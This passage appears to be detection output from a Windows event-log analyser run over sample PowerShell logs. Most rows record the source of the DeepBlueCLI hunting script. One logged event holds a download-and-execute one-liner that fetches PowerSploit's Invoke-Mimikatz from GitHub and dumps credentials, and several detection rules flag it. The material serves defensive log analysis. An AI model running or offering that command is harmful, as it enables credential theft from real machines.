$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.578 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:20.581 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.201 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.202 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.203 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. 
Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:27.734 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:49.131 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:40:56.217 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell 
Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:03.586 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:12.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:14.161 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:28.002 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.553 
+09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" 
Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message 
is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ #$eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength 
$regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. 
# Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} """,../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 01:41:37.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
